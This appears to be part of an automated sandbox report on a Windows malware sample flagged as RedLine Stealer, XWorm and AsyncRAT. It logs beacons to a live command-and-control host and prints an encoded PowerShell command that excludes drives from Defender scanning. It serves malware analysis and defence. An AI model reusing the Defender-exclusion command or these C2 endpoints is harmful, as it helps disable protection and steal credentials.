                                                                                                                  Dec 9, 2024 11:04:50.133594036 CET4970437552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:04:50.178194046 CET4970437552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:04:50.297576904 CET3755249704192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:04:50.530888081 CET4970437552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:04:50.650300980 CET3755249704192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:04:54.271045923 CET4971180192.168.2.10208.95.112.1
                                                                                                                  Dec 9, 2024 11:04:54.390396118 CET8049711208.95.112.1192.168.2.10
                                                                                                                  Dec 9, 2024 11:04:54.391050100 CET4971180192.168.2.10208.95.112.1
                                                                                                                  Dec 9, 2024 11:04:54.396163940 CET4971180192.168.2.10208.95.112.1
                                                                                                                  Dec 9, 2024 11:04:54.515569925 CET8049711208.95.112.1192.168.2.10
                                                                                                                  Dec 9, 2024 11:04:55.549808979 CET8049711208.95.112.1192.168.2.10
                                                                                                                  Dec 9, 2024 11:04:55.593209028 CET4971180192.168.2.10208.95.112.1
                                                                                                                  Dec 9, 2024 11:05:00.561120987 CET3755249704192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:00.561202049 CET4970437552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:00.613440990 CET4970437552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:00.732723951 CET3755249704192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:05.673295021 CET4974037552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:05.792721033 CET3755249740192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:05.792979002 CET4974037552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:05.793296099 CET4974037552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:05.912511110 CET3755249740192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:06.140413046 CET4974037552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:06.259998083 CET3755249740192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:16.188189983 CET3755249740192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:16.188277960 CET4974037552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:16.188489914 CET4974037552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:16.307930946 CET3755249740192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:21.238951921 CET4977737552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:21.358350992 CET3755249777192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:21.358481884 CET4977737552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:21.358750105 CET4977737552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:21.477998972 CET3755249777192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:21.702759027 CET4977737552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:21.822119951 CET3755249777192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:31.798557043 CET3755249777192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:31.798636913 CET4977737552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:31.798810959 CET4977737552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:31.918128967 CET3755249777192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:36.814393044 CET4981337552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:36.933689117 CET3755249813192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:36.933789015 CET4981337552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:36.934004068 CET4981337552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:37.053349972 CET3755249813192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:37.281191111 CET4981337552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:37.400597095 CET3755249813192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:47.255934954 CET3755249813192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:47.256000996 CET4981337552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:47.256123066 CET4981337552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:47.375369072 CET3755249813192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:52.266431093 CET4984937552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:52.385915041 CET3755249849192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:52.386020899 CET4984937552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:52.386322021 CET4984937552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:52.505908012 CET3755249849192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:52.734294891 CET4984937552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:05:52.853858948 CET3755249849192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:59.473043919 CET8049711208.95.112.1192.168.2.10
                                                                                                                  Dec 9, 2024 11:05:59.473166943 CET4971180192.168.2.10208.95.112.1
                                                                                                                  Dec 9, 2024 11:06:02.695939064 CET3755249849192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:02.699270010 CET4984937552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:02.699382067 CET4984937552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:02.818553925 CET3755249849192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:07.050065041 CET498847000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:07.172049999 CET700049884192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:07.172164917 CET498847000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:07.216814041 CET498847000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:07.336659908 CET700049884192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:07.704514980 CET4988537552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:07.823832989 CET3755249885192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:07.824975967 CET4988537552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:07.825258970 CET4988537552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:07.946533918 CET3755249885192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:08.182401896 CET4988537552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:08.306885004 CET3755249885192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:17.509237051 CET700049884192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:17.509398937 CET498847000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:18.131122112 CET3755249885192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:18.133356094 CET4988537552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:18.133469105 CET4988537552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:18.253005981 CET3755249885192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:20.593723059 CET498847000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:20.596048117 CET499177000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:20.713087082 CET700049884192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:20.716321945 CET700049917192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:20.716432095 CET499177000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:20.732387066 CET499177000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:20.851814032 CET700049917192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:23.141618013 CET4992337552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:23.261461020 CET3755249923192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:23.265372992 CET4992337552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:23.265655994 CET4992337552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:23.385030985 CET3755249923192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:23.626219988 CET4992337552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:23.745596886 CET3755249923192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:31.155664921 CET700049917192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:31.155843019 CET499177000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:32.375010014 CET499177000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:32.381453991 CET499447000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:32.494368076 CET700049917192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:32.500735998 CET700049944192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:32.500823975 CET499447000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:32.828326941 CET499447000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:32.952044964 CET700049944192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:33.644155979 CET3755249923192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:33.645441055 CET4992337552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:33.645525932 CET4992337552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:33.766302109 CET3755249923192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:35.565515041 CET4971180192.168.2.10208.95.112.1
                                                                                                                  Dec 9, 2024 11:06:35.684999943 CET8049711208.95.112.1192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:38.657356977 CET4996037552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:38.777326107 CET3755249960192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:38.777431011 CET4996037552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:38.777611017 CET4996037552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:38.897185087 CET3755249960192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:39.125053883 CET4996037552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:39.245749950 CET3755249960192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:42.915112972 CET700049944192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:42.915221930 CET499447000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:43.844080925 CET499447000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:43.846395016 CET499737000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:43.964879036 CET700049944192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:43.966483116 CET700049973192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:43.966713905 CET499737000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:43.983134031 CET499737000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:44.102749109 CET700049973192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:49.182894945 CET3755249960192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:49.183069944 CET4996037552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:49.183183908 CET4996037552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:49.302666903 CET3755249960192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:54.234297991 CET700049973192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:54.237549067 CET499737000192.168.2.10192.169.69.26

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 9, 2024 11:04:49.615761042 CET6450453192.168.2.101.1.1.1
                                                                                                                  Dec 9, 2024 11:04:49.955157995 CET53645041.1.1.1192.168.2.10
                                                                                                                  Dec 9, 2024 11:04:54.112054110 CET6273753192.168.2.101.1.1.1
                                                                                                                  Dec 9, 2024 11:04:54.251852036 CET53627371.1.1.1192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:06.664273977 CET6279453192.168.2.101.1.1.1
                                                                                                                  Dec 9, 2024 11:06:07.000431061 CET53627941.1.1.1192.168.2.10

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Dec 9, 2024 11:04:49.615761042 CET192.168.2.101.1.1.10x7c51Standard query (0)duclog23.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                  Dec 9, 2024 11:04:54.112054110 CET192.168.2.101.1.1.10x76bcStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 9, 2024 11:06:06.664273977 CET192.168.2.101.1.1.10xbe17Standard query (0)duclog23.duckdns.orgA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Dec 9, 2024 11:04:49.955157995 CET1.1.1.1192.168.2.100x7c51No error (0)duclog23.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                                                                  Dec 9, 2024 11:04:54.251852036 CET1.1.1.1192.168.2.100x76bcNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                  Dec 9, 2024 11:05:20.498800993 CET1.1.1.1192.168.2.100x4cc4No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                  Dec 9, 2024 11:05:20.498800993 CET1.1.1.1192.168.2.100x4cc4No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                  Dec 9, 2024 11:06:07.000431061 CET1.1.1.1192.168.2.100xbe17No error (0)duclog23.duckdns.org192.169.69.26A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • duclog23.duckdns.org:37552
                                                                                                                  • ip-api.com

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.1049704192.169.69.26375528096C:\Users\user\AppData\Roaming\M2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 9, 2024 11:04:50.178194046 CET247OUTPOST / HTTP/1.1
                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                  Host: duclog23.duckdns.org:37552
                                                                                                                  Content-Length: 137
                                                                                                                  Expect: 100-continue
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.1049711208.95.112.1807184C:\Users\user\AppData\Roaming\Metin.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 9, 2024 11:04:54.396163940 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                  Host: ip-api.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 9, 2024 11:04:55.549808979 CET175INHTTP/1.1 200 OK
                                                                                                                  Date: Mon, 09 Dec 2024 10:04:54 GMT
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  Content-Length: 6
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  X-Ttl: 60
                                                                                                                  X-Rl: 44
                                                                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                                                                  Data Ascii: false


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.1049740192.169.69.26375528096C:\Users\user\AppData\Roaming\M2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 9, 2024 11:05:05.793296099 CET247OUTPOST / HTTP/1.1
                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                  Host: duclog23.duckdns.org:37552
                                                                                                                  Content-Length: 137
                                                                                                                  Expect: 100-continue
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.1049777192.169.69.26375528096C:\Users\user\AppData\Roaming\M2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 9, 2024 11:05:21.358750105 CET247OUTPOST / HTTP/1.1
                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                  Host: duclog23.duckdns.org:37552
                                                                                                                  Content-Length: 137
                                                                                                                  Expect: 100-continue
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.1049813192.169.69.26375528096C:\Users\user\AppData\Roaming\M2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 9, 2024 11:05:36.934004068 CET247OUTPOST / HTTP/1.1
                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                  Host: duclog23.duckdns.org:37552
                                                                                                                  Content-Length: 137
                                                                                                                  Expect: 100-continue
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.1049849192.169.69.26375528096C:\Users\user\AppData\Roaming\M2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 9, 2024 11:05:52.386322021 CET247OUTPOST / HTTP/1.1
                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                  Host: duclog23.duckdns.org:37552
                                                                                                                  Content-Length: 137
                                                                                                                  Expect: 100-continue
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.1049885192.169.69.26375528096C:\Users\user\AppData\Roaming\M2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 9, 2024 11:06:07.825258970 CET247OUTPOST / HTTP/1.1
                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                  Host: duclog23.duckdns.org:37552
                                                                                                                  Content-Length: 137
                                                                                                                  Expect: 100-continue
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.1049923192.169.69.26375528096C:\Users\user\AppData\Roaming\M2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 9, 2024 11:06:23.265655994 CET247OUTPOST / HTTP/1.1
                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                  Host: duclog23.duckdns.org:37552
                                                                                                                  Content-Length: 137
                                                                                                                  Expect: 100-continue
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.1049960192.169.69.26375528096C:\Users\user\AppData\Roaming\M2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 9, 2024 11:06:38.777611017 CET247OUTPOST / HTTP/1.1
                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                  Host: duclog23.duckdns.org:37552
                                                                                                                  Content-Length: 137
                                                                                                                  Expect: 100-continue
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:1
                                                                                                                  Start time:05:04:45
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Users\user\Desktop\f5ATZ1i5CU.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\f5ATZ1i5CU.exe"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:261'120 bytes
                                                                                                                  MD5 hash:854A42E9A581B2A33CEDA0F3D3DD2F04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:05:04:45
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA="
                                                                                                                  Imagebase:0xa90000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:05:04:46
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:05:04:46
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\M2.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\M2.exe"
                                                                                                                  Imagebase:0x2f0000
                                                                                                                  File size:97'792 bytes
                                                                                                                  MD5 hash:2598B5FEE38D9C0979F009E77F94EA33
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: unknown
                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: ditekSHen
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 89%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:05:04:46
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:05:04:46
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Metin.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Metin.exe"
                                                                                                                  Imagebase:0x970000
                                                                                                                  File size:52'736 bytes
                                                                                                                  MD5 hash:1D846637AA409D6DD4FD14F70A63F907
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.2542545307.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Metin.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Metin.exe, Author: Joe Security
